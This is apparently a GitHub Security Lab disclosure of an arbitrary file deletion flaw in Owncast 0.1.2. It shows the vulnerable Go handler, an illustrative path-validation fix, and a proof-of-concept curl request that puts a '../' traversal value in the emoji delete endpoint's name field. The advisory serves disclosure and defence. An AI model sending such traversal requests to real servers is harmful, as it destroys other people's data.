April 12, 2024

GHSL-2023-277: Arbitrary File Deletion (AFD) in Owncast - CVE-2024-31450

GitHub Security Lab

Coordinated Disclosure Timeline

Summary

Owncast in version 0.1.2 allows remote attackers with administrator privileges to delete arbitrary files by making a malicious POST request to /api/admin/emoji/delete.

Product

Owncast

Tested Version

v0.1.2

Details

Arbitrary file deletion in emoji.go (GHSL-2023-277)

The Owncast application exposes an administrator API at the URL /api/admin. The emoji/delete endpoint of this API allows administrators to delete custom emojis, which are saved on disk. As the following snippet shows, the name parameter is taken from the JSON request and appended directly to the file path that points to the emoji to delete:

controllers/admin/emoji.go:63

func DeleteCustomEmoji(w http.ResponseWriter, r *http.Request) {
	if !requirePOST(w, r) {
		return
	}

	type deleteEmoji struct {
		Name string `json:"name"`
	}

	emoji := new(deleteEmoji)

	if err := json.NewDecoder(r.Body).Decode(emoji); err != nil {
		// --snip--
	}

	// var emojiFileName = filepath.Base(emoji.Name)
	targetPath := filepath.Join(config.CustomEmojiPath, emoji.Name)

	if err := os.Remove(targetPath); err != nil {
		// --snip--
	}
	// --snip--
}

By using path traversal sequences (../), attackers with administrative privileges can exploit this endpoint to delete arbitrary files on the system, outside of the emoji directory.
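One way to constrain the name before it reaches os.Remove, as an added example (not Owncast's code or its actual patch). The helper resolveEmojiPath, the error ErrUnsafeName and the directory "data/emoji" (standing in for config.CustomEmojiPath) are hypothetical names chosen for illustration:

```go
package main

import (
	"errors"
	"fmt"
	"path/filepath"
	"strings"
)

// ErrUnsafeName is returned when a name would resolve outside the base directory.
var ErrUnsafeName = errors.New("unsafe emoji name")

// resolveEmojiPath (hypothetical helper) maps a client-supplied emoji name to a
// path that is guaranteed to be a direct child of baseDir.
func resolveEmojiPath(baseDir, name string) (string, error) {
	// An emoji name must be a bare file name, never a path: reject empty
	// names, dot entries, NUL bytes and anything carrying a separator.
	if name == "" || name == "." || name == ".." ||
		strings.ContainsAny(name, `/\`) || strings.ContainsRune(name, 0) {
		return "", ErrUnsafeName
	}
	base, err := filepath.Abs(baseDir)
	if err != nil {
		return "", err
	}
	target := filepath.Join(base, name)
	// Defense in depth: after cleaning, the target must still be exactly
	// base/name, so the relative path back from base equals the name itself.
	rel, err := filepath.Rel(base, target)
	if err != nil || rel != name {
		return "", ErrUnsafeName
	}
	return target, nil
}

func main() {
	// Constructed inputs; the second is the name value from the request shown in this advisory.
	names := []string{"party.png", "../../../../../../../tmp/test", "a/../../b", `..\x`, ""}
	for _, n := range names {
		p, err := resolveEmojiPath("data/emoji", n)
		fmt.Printf("%q -> %q, err=%v\n", n, p, err)
	}
}
```

A delete handler built on this would call os.Remove only on the path the helper returns and answer with a client error when ErrUnsafeName comes back.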

Impact

This issue may lead to arbitrary file deletion.

Resources

To exploit this vulnerability, an attacker may make the following POST request:

curl -X 'POST' \
    -H 'Authorization: Basic <ADMIN_CREDENTIALS>' \
    --data '{"name":"../../../../../../../tmp/test"}' \
    'http://(victim_server):8080/api/admin/emoji/delete'

Note that credentials for the admin user are needed.

CVE

CVE-2024-31450

Credit

This issue was discovered and reported by the GitHub CodeQL team member @atorralba (Tony Torralba). The vulnerability was found with the help of CodeQL’s path injection query.

Contact

You can contact the GHSL team at securitylab@github.com. Please include a reference to GHSL-2023-277 in any communication regarding this issue.